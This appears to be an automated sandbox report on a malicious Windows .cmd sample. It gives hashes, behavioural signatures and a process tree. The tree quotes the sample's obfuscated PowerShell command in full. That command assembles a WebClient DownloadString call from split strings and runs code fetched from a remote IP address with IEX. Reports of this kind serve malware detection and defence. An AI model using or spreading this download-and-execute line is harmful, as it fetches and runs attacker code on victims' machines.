Analysis
- max time kernel: 118s
- max time network: 119s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 28/02/2025, 07:11
Static task: static1
Behavioral task: behavioral1
Sample: 185.7.214_1.211.cmd
Resource: win7-20240903-en
5 signatures, 150 seconds
General
- Target: 185.7.214_1.211.cmd
- Size: 172B
- MD5: e3f9c42a3eee3a73f89685a8c2cc027e
- SHA1: 9d934754caf36aeb28f239f0011bedc4f68138f5
- SHA256: 2ce52ae9ba8114731368521d8dfdc951e901d13316ebaca8231ab398ae69c85a
- SHA512: 51d8caf7b1dad18417c236660e7c87b7bbf5a96b0bd78166eb3897b995938708767d1ad0e32250dc246d88f40838e228154d7028ecf708e4b54fea7f0fde57a9
Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs (ps1.dropper): http://185.7.214.211/a.mp4
Signatures
- Blocklisted process makes network request (1 IoC)
  flow 4, pid 2464, process powershell.exe
- Command and Scripting Interpreter: PowerShell (1 IoC)
  pid 2464, process powershell.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 2464, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description: Token: SeDebugPrivilege, pid 2464, process powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description: PID 2376 wrote to memory of 2464, pid 2376, process cmd.exe, procid_target 31
  description: PID 2376 wrote to memory of 2464, pid 2376, process cmd.exe, procid_target 31
  description: PID 2376 wrote to memory of 2464, pid 2376, process cmd.exe, procid_target 31
Processes
- C:\Windows\system32\cmd.exe (PID: 2376)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\185.7.214_1.211.cmd"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 2464)
    powershell -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/a.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken